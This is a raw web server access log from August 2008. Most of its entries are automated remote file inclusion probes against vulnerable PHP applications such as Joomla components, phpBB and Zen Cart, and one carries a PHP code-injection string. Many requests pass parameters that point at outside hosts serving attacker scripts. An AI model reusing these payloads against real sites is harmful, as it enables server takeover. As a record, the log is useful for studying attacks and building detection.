64.22.89.194 - - [23/Aug/2008:20:03:51 -0500] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.812"
74.55.109.34 - - [23/Aug/2008:20:04:18 -0500] "GET /logs/access_log.1214179200/errors.php?error=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
74.55.109.34 - - [23/Aug/2008:20:04:18 -0500] "GET /logs/access_log.1214179200/errors.php?error=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
64.22.89.194 - - [23/Aug/2008:20:04:44 -0500] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.812"
72.29.68.128 - - [23/Aug/2008:20:04:51 -0500] "GET /logs/access_log.1214438400//?path%5Bdocroot%5D=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
74.55.109.34 - - [23/Aug/2008:20:05:07 -0500] "GET /logs/access_log.1213488000/errors.php?error=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
74.55.109.34 - - [23/Aug/2008:20:05:07 -0500] "GET /logs/access_log.1213488000/errors.php?error=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
12.192.82.221 - - [23/Aug/2008:20:07:42 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://h1.ripway.com/l33tunix/TT??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
12.192.82.221 - - [23/Aug/2008:20:07:42 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://h1.ripway.com/l33tunix/TT??? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
202.181.210.195 - - [23/Aug/2008:20:08:01 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
202.181.210.195 - - [23/Aug/2008:20:08:01 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
77.221.130.3 - - [23/Aug/2008:20:10:13 -0500] "GET /logs/access_log.1208044800//?mosConfig_absolute_path=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
77.221.130.3 - - [23/Aug/2008:20:10:14 -0500] "GET //?mosConfig_absolute_path=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
77.221.130.3 - - [23/Aug/2008:20:10:15 -0500] "GET /logs//?mosConfig_absolute_path=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 200 96475 "-""libwww-perl/5.803"
119.63.193.56 - - [23/Aug/2008:20:10:30 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider_jp.html)"
203.98.87.14 - - [23/Aug/2008:20:11:17 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/lamer2020/safe1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
202.181.210.195 - - [23/Aug/2008:20:11:20 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
202.181.210.195 - - [23/Aug/2008:20:11:20 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
217.20.113.117 - - [23/Aug/2008:20:11:28 -0500] "GET /logs/access_log.1214438400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
217.20.113.117 - - [23/Aug/2008:20:11:28 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
217.20.113.117 - - [23/Aug/2008:20:11:29 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
72.29.68.128 - - [23/Aug/2008:20:11:48 -0500] "GET /logs/access_log.1206748800//?path%5Bdocroot%5D=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
91.121.4.30 - - [23/Aug/2008:20:11:57 -0500] "GET /logs/access_log.1214524800/errors.php?error=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.62.80.134 - - [23/Aug/2008:20:12:00 -0500] "GET //coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
209.62.80.134 - - [23/Aug/2008:20:12:00 -0500] "GET /logs//coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 317 "-""Advanced Browser (http://www.avantbrowser.com)"
72.29.68.128 - - [23/Aug/2008:20:12:08 -0500] "GET /logs/access_log.1213488000//?path%5Bdocroot%5D=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
66.225.211.135 - - [23/Aug/2008:20:12:40 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://h1.ripway.com/l33tunix/TT??? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
66.225.211.135 - - [23/Aug/2008:20:12:40 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://h1.ripway.com/l33tunix/TT??? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
91.142.214.149 - - [23/Aug/2008:20:13:39 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://utilz.info/a4? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
91.142.214.149 - - [23/Aug/2008:20:13:40 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://utilz.info/a4? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
77.221.130.3 - - [23/Aug/2008:20:14:06 -0500] "GET /logs/access_log.1208044800//?mosConfig_absolute_path=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
77.221.130.3 - - [23/Aug/2008:20:14:06 -0500] "GET //?mosConfig_absolute_path=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
77.221.130.3 - - [23/Aug/2008:20:14:07 -0500] "GET /logs//?mosConfig_absolute_path=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 200 96475 "-""libwww-perl/5.803"
74.6.8.121 - - [23/Aug/2008:20:14:16 -0500] "GET /logs/access_log.1182211200 HTTP/1.0" 200 119739 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
91.142.214.149 - - [23/Aug/2008:20:16:37 -0500] "GET /logs/access_log.1206230400/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://utilz.info/a4? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
91.142.214.149 - - [23/Aug/2008:20:16:37 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://utilz.info/a4? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
91.142.214.149 - - [23/Aug/2008:20:16:38 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://utilz.info/a4? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
209.97.213.28 - - [23/Aug/2008:20:17:30 -0500] "GET /logs/access_log.1213401600//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.soaresdacosta.pt/readme.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
209.97.213.28 - - [23/Aug/2008:20:17:31 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.soaresdacosta.pt/readme.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
193.207.106.54 - - [23/Aug/2008:20:18:39 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
193.207.106.54 - - [23/Aug/2008:20:18:39 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
207.58.167.158 - - [23/Aug/2008:20:18:56 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.65"
207.58.167.158 - - [23/Aug/2008:20:18:56 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.65"
207.58.167.158 - - [23/Aug/2008:20:18:56 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.65"
207.58.167.158 - - [23/Aug/2008:20:18:56 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.65"
91.93.128.125 - - [23/Aug/2008:20:19:09 -0500] "GET /logs/access_log.1214179200/errors.php?error=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
64.22.89.194 - - [23/Aug/2008:20:19:39 -0500] "GET /logs/access_log.1214438400/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:20:19:39 -0500] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.812"
64.22.89.194 - - [23/Aug/2008:20:19:39 -0500] "GET /logs/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.812"
91.93.128.125 - - [23/Aug/2008:20:19:54 -0500] "GET /logs/access_log.1213488000/errors.php?error=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
64.22.89.194 - - [23/Aug/2008:20:20:27 -0500] "GET /logs/access_log.1205798400/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.812"
209.97.213.28 - - [23/Aug/2008:20:21:52 -0500] "GET /logs/access_log.1214524800//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.soaresdacosta.pt/readme.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
217.20.113.117 - - [23/Aug/2008:20:22:12 -0500] "GET /logs/access_log.1213401600//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
84.21.71.133 - - [23/Aug/2008:20:22:28 -0500] "GET /logs/admin/spaw/errors.php?error=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
84.21.71.133 - - [23/Aug/2008:20:22:31 -0500] "GET /admin/spaw/errors.php?error=http://paginas.terra.com.br/lazer/xfatalzinhox/id3.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
83.17.61.114 - - [23/Aug/2008:20:22:37 -0500] "GET /logs/access_log.1206662400//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.geocities.com/kumpulan_surat_sephani/devil.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
80.67.23.3 - - [23/Aug/2008:20:24:20 -0500] "GET /logs/index.php?custompluginfile[]=http://flrvs.com/id.txt%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
80.67.23.3 - - [23/Aug/2008:20:24:20 -0500] "GET /logs/access_log.1214438400/index.php?custompluginfile[]=http://flrvs.com/id.txt%0D?? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
80.67.23.3 - - [23/Aug/2008:20:24:20 -0500] "GET /index.php?custompluginfile[]=http://flrvs.com/id.txt%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.808"
80.67.23.3 - - [23/Aug/2008:20:24:37 -0500] "GET /logs/access_log.1214179200/index.php?custompluginfile[]=http://flrvs.com/id.txt%0D?? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
207.58.167.158 - - [23/Aug/2008:20:26:37 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
207.58.167.158 - - [23/Aug/2008:20:26:37 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.65"
12.192.82.221 - - [23/Aug/2008:20:26:57 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/l33tunix/TT??? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
12.192.82.221 - - [23/Aug/2008:20:26:57 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/l33tunix/TT??? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
209.51.155.138 - - [23/Aug/2008:20:28:25 -0500] "GET /logs/access_log.1214524800/errors.php?error=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
66.225.211.135 - - [23/Aug/2008:20:28:46 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/l33tunix/TT??? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
66.225.211.135 - - [23/Aug/2008:20:28:46 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/l33tunix/TT??? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
66.225.211.135 - - [23/Aug/2008:20:29:00 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/l33tunix/TT??? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
66.225.211.135 - - [23/Aug/2008:20:29:00 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/l33tunix/TT??? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
217.20.113.117 - - [23/Aug/2008:20:30:24 -0500] "GET /logs/inurl:%22com_dbquery%22http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.79"
217.20.113.117 - - [23/Aug/2008:20:30:25 -0500] "GET /inurl:%22com_dbquery%22http://www.tiibetinspanielit.fi/forum/ids.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
12.192.82.221 - - [23/Aug/2008:20:30:39 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/l33tunix/TT??? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
12.192.82.221 - - [23/Aug/2008:20:30:39 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/l33tunix/TT??? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
91.142.214.149 - - [23/Aug/2008:20:31:06 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://utilz.info/a4? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
91.142.214.149 - - [23/Aug/2008:20:31:07 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://utilz.info/a4? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
91.142.214.149 - - [23/Aug/2008:20:31:40 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://utilz.info/a4? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
91.142.214.149 - - [23/Aug/2008:20:31:41 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://utilz.info/a4? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
74.6.8.121 - - [23/Aug/2008:20:33:37 -0500] "GET /costume/thmb2.htm HTTP/1.0" 200 3346 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
213.235.217.26 - - [23/Aug/2008:20:34:00 -0500] "GET /logs/access_log.1214179200/errors.php?error=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
67.18.151.242 - - [23/Aug/2008:20:34:19 -0500] "GET /logs/inurl:%22com_dbquery%22http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 362 "-""libwww-perl/5.810"
67.18.151.242 - - [23/Aug/2008:20:34:19 -0500] "GET /inurl:%22com_dbquery%22http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 357 "-""libwww-perl/5.810"
213.235.217.26 - - [23/Aug/2008:20:34:43 -0500] "GET /logs/access_log.1213488000/errors.php?error=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
207.58.167.158 - - [23/Aug/2008:20:35:21 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 356 "-""libwww-perl/5.65"
207.58.167.158 - - [23/Aug/2008:20:35:22 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 351 "-""libwww-perl/5.65"
62.87.154.41 - - [23/Aug/2008:20:37:12 -0500] "GET /logs/access_log.1215216000/inurl:%22com_dbquery%22http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 379 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
62.87.154.41 - - [23/Aug/2008:20:37:12 -0500] "GET /inurl:%22com_dbquery%22http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 352 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
62.87.154.41 - - [23/Aug/2008:20:37:12 -0500] "GET /logs/inurl:%22com_dbquery%22http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 357 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
77.221.130.3 - - [23/Aug/2008:20:37:27 -0500] "GET /logs/access_log.1206230400//?mosConfig_absolute_path=http://www.jorvani.com/subastas/includes/images/idnews.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
74.55.109.34 - - [23/Aug/2008:20:40:27 -0500] "GET /logs/access_log.1214524800/errors.php?error=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
74.55.109.34 - - [23/Aug/2008:20:40:27 -0500] "GET /logs/access_log.1214524800/errors.php?error=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
198.145.244.100 - - [23/Aug/2008:20:41:06 -0500] "GET /logs/access_log.1208044800//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.uclv.org.ve//modules/My_eGallery/images/readme1.txt? HTTP/1.1" 404 353 "-""libwww-perl/5.79"
198.145.244.100 - - [23/Aug/2008:20:41:06 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.uclv.org.ve//modules/My_eGallery/images/readme1.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
198.145.244.100 - - [23/Aug/2008:20:41:06 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.uclv.org.ve//modules/My_eGallery/images/readme1.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
198.145.244.100 - - [23/Aug/2008:20:43:03 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.uclv.org.ve//modules/My_eGallery/images/readme1.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
198.145.244.100 - - [23/Aug/2008:20:43:03 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.uclv.org.ve//modules/My_eGallery/images/readme1.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
89.111.176.9 - - [23/Aug/2008:20:43:18 -0500] "GET /logs/access_log.1214179200/errors.php?error=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.111.176.9 - - [23/Aug/2008:20:44:00 -0500] "GET /logs/access_log.1213488000/errors.php?error=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
212.241.212.236 - - [23/Aug/2008:20:44:54 -0500] "GET /logs/access_log.1208044800//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.803"
212.241.212.236 - - [23/Aug/2008:20:44:54 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
212.241.212.236 - - [23/Aug/2008:20:44:54 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
80.67.20.130 - - [23/Aug/2008:20:45:19 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idbr.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.808"
80.67.20.130 - - [23/Aug/2008:20:45:54 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idbr.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.808"
91.142.214.149 - - [23/Aug/2008:20:45:54 -0500] "GET /logs/access_log.1204156800/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://utilz.info/a4? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
212.241.212.236 - - [23/Aug/2008:20:46:01 -0500] "GET /logs/access_log.1209600000//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebs.com/lostmind7/idv6.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.803"
80.67.20.130 - - [23/Aug/2008:20:46:03 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idbr.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.808"
80.67.20.130 - - [23/Aug/2008:20:46:15 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://spiritualcultivation.com/modules/idbr.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.808"
12.192.82.221 - - [23/Aug/2008:20:46:30 -0500] "GET /logs/access_log.1214524800/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/l33tunix/TT??? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
12.192.82.221 - - [23/Aug/2008:20:46:30 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/l33tunix/TT??? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
12.192.82.221 - - [23/Aug/2008:20:46:30 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/l33tunix/TT??? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
198.145.244.100 - - [23/Aug/2008:20:46:35 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.uclv.org.ve//modules/My_eGallery/images/readme1.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
66.225.211.135 - - [23/Aug/2008:20:47:34 -0500] "GET /logs/access_log.1214524800/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/l33tunix/TT??? HTTP/1.1" 404 367 "-""libwww-perl/5.810"
66.225.211.135 - - [23/Aug/2008:20:47:34 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/l33tunix/TT??? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
66.225.211.135 - - [23/Aug/2008:20:47:34 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/l33tunix/TT??? HTTP/1.1" 404 345 "-""libwww-perl/5.810"
207.58.167.158 - - [23/Aug/2008:20:48:14 -0500] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
207.58.167.158 - - [23/Aug/2008:20:48:14 -0500] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://auction.thinaironline.com/counter/id.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.65"
198.145.244.100 - - [23/Aug/2008:20:49:14 -0500] "GET /logs/access_log.1203379200//includes/cart.inc.php?dir_path=http://www.uclv.org.ve//modules/My_eGallery/images/readme1.txt? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
198.145.244.100 - - [23/Aug/2008:20:49:14 -0500] "GET //includes/cart.inc.php?dir_path=http://www.uclv.org.ve//modules/My_eGallery/images/readme1.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
198.145.244.100 - - [23/Aug/2008:20:49:14 -0500] "GET /logs//includes/cart.inc.php?dir_path=http://www.uclv.org.ve//modules/My_eGallery/images/readme1.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
198.145.244.100 - - [23/Aug/2008:20:51:31 -0500] "GET /logs/access_log.1205366400//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.uclv.org.ve//modules/My_eGallery/images/readme1.txt? HTTP/1.1" 404 353 "-""libwww-perl/5.79"
91.93.128.125 - - [23/Aug/2008:20:53:17 -0500] "GET /logs/access_log.1214524800/errors.php?error=http://www.mcclung.ca/prc.gif? HTTP/1.1" 404 321 "-""libwww-perl/5.813"
161.58.59.241 - - [23/Aug/2008:20:53:24 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://leqhi.com/id.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.65"
161.58.59.241 - - [23/Aug/2008:20:53:24 -0500] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://leqhi.com/id.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.65"
12.192.82.221 - - [23/Aug/2008:20:54:34 -0500] "GET /logs/access_log.1214438400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/l33tunix/TT??? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
74.6.8.121 - - [23/Aug/2008:20:55:03 -0500] "GET /logs/access_log.1175904000 HTTP/1.0" 200 171086 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
198.145.244.100 - - [23/Aug/2008:20:55:07 -0500] "GET //includes/cart.inc.php?dir_path=http://www.uclv.org.ve//modules/My_eGallery/images/readme1.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
66.225.211.135 - - [23/Aug/2008:20:55:12 -0500] "GET /logs/access_log.1214438400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/l33tunix/TT??? HTTP/1.1" 404 367 "-""libwww-perl/5.810"
